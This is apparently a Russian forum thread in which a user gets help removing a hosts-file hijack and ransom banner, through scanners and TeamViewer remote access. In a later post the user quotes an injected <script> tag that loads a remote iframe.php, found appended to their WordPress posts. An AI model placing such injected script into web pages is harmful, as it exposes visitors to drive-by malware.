161 ответов в этой теме

[l.e.e.]

Удаленный доступ тут

[maza177]

Как я устал от всего. кто может помоч за деньги.. дам доступ, что угодно.

[mrbelyash]

Как я устал от всего. кто может помоч за деньги.. дам доступ, что угодно.

деньги-пыль...люди-все

Давайте в личку id и пароль, попробую

http://www.teamviewer.com/download/TeamViewerQS_ru.exe

[mrbelyash]

меня рвет в пух и прах....просят зарегестрироваться.
------------

Там какая-то гадость восстанавливает в HKCU\RUN копирвание нового hosts

Сообщение было изменено mrbelyash: 05 Январь 2013 - 20:04

[mrbelyash]

не могу подключиться

[mrbelyash]

я угадал

[3421]

Решено?

[3421]

Лишним не будет знать, чем ещё проверить.

Без паники. Скачиваете это. Устанавливаете. Обновляете базы каждого продукта. Найденные файлы здесь проверить. https://www.virustotal.com/ чтобы остальным известно стало.
HitmanPro 3 - Second Opinion Malware Scanner http://www.surfright.nl/en/hitmanpro/
Emsisoft Emergency Kit 3.0 http://www.emsisoft.ru/ru/software/eek
Malwarebytes Anti-Malware http://www.malwarebytes.org/

[mrbelyash]

Лишним не будет знать, чем ещё проверить.

Без паники. Скачиваете это. Устанавливаете. Обновляете базы каждого продукта. Найденные файлы здесь проверить. https://www.virustotal.com/ чтобы остальным известно стало.
HitmanPro 3 - Second Opinion Malware Scanner http://www.surfright.nl/en/hitmanpro/
Emsisoft Emergency Kit 3.0 http://www.emsisoft.ru/ru/software/eek
Malwarebytes Anti-Malware http://www.malwarebytes.org/

Зачем?
он доктором детектится.

[3421]

Не всё можно найти одной антивирусной программой. Я подготавливал свой ответ, когда вашего ответа еще не видел. На будущее пускай знают, кто читает. Как уже написал. Моё мнение лишним знать об этих программах не будет.

[run]

Не всё можно найти одной антивирусной программой. Я подготавливал свой ответ, когда вашего ответа еще не видел. На будущее пускай знают, кто читает. Как уже написал. Моё мнение лишним знать об этих программах не будет.

Найти это конечно гуд, а вот личить они могут?, это довольно не тривиальная задача которая очень важна, так как не редко при тупом удалении система получает инвалидность или вообще в коме.

[maza177]

Большое спасибо Вам все рабята, что откликнулись на мою проблему и помогли: кто советом, кто действием.
Особенно хочу выразить благодарность такаому человеку какmrbelyash, человек дела! Умный отзывчивый, находчивый, через таймвивер помог излечить мой ПК, удалил файлы, проделал столько комбинаций. Умный и порядочный человек, человек дела, повторюсь! Большое спасибо, что есть такие люди как ты. Удачи тебе во всем!
Так же всем кто откликнулся.
И Сашуле тоже большое спасибо.
mrbelyash - если у вас есть блог или сайт, то я с удовольствием сделаю упоминание и размещу ссылку на своём днивнике.

[mrbelyash]

http://stop-winlock.ru

[maza177]

Как и обещал сделал упоминание о Вас http://mazablog.ru/?p=1935 у себя на блоге! Ещё раз всем спасибо за помощь!

Сообщение было изменено maza177: 07 Январь 2013 - 04:02

[mrbelyash]

А нужно через Sandboxie ходить
http://mrbelyash.blogspot.com/2012/01/sandboxie.html

[maza177]

Опять сталкнулся с такой проблемой, пытался сново решить её, опять же.  фиксить нечего так как там нет подозрительного ничего, в ланировщике заданиий тоже нет ничего, доктор вбе качал обновленный, тоже не нашел ничего,  CClener очистил все, и hosts заменил файлы - ничего не помогло.

 

Ps. Пишу статью на блог, это не вирус в каждой статье прописывается iframe код, как удалить не знаю, на примере вордпресса, как такая статья в ней ничего нет, а когда открываеш когда пост пишешь в htm версии в конце поста iframe код прописывается (пишу пост к примеру на вордпрессе (движок) в посту не видно никаких ссылок  ВИЗУАЛЬНО (ружим) когда переключаюсь в HTML версию, то виду в конце поста ссылки iframe)  <script type="text/javascript" src="http://antispamvksocialcheck.info/iframe.php"></script>

 

Ps.s. выходит сайты тоже вирус мои поймали, или же вирус умный, на компе сидит и ждет когда я посты писать буду и начинате в это время прописываться?

 

Прикрепил файл,

Прикрепленные файлы:

•  hijackthis.log   12,91К   6 Скачано раз

[maza177]

Доступа опять нет, не на яндеккс, не на фейсбук, не вконтакте, никуда.

[maza177]

mrbelyash тогда помог мне, предоставлял удалённый доступ, за что ему огромное спасибо.

В этот раз подхватил вирус с одного очень плохого сайта, (адрес не помню только помню было написанно "Жабе 7 лет") после чего маргнуло и опера закрылась, и симпктомы на лицо.

А всего навсего продавал ручку, Пеликан немецкую 1960 годов примерно,  и набор циркулей.

А тут у них вирус

[maza177]

могу писать только в экспролере, вот даже в опере не могу пост напсиать, лезит баннер

Прикрепленные файлы:

•  fd.jpg   50,15К   1 Скачано раз

[SergM]

 Пофиксите 

 

O17 - HKLM\System\CCS\Services\Tcpip\..\{7859809D-D40A-4757-9331-855DB654889B}: NameServer = 10.77.48.49 10.77.48.33
O17 - HKLM\System\CCS\Services\Tcpip\..\{CC1AB230-828C-47A3-BAF8-7CC33F9AFA24}: NameServer = 10.77.48.33 10.77.48.49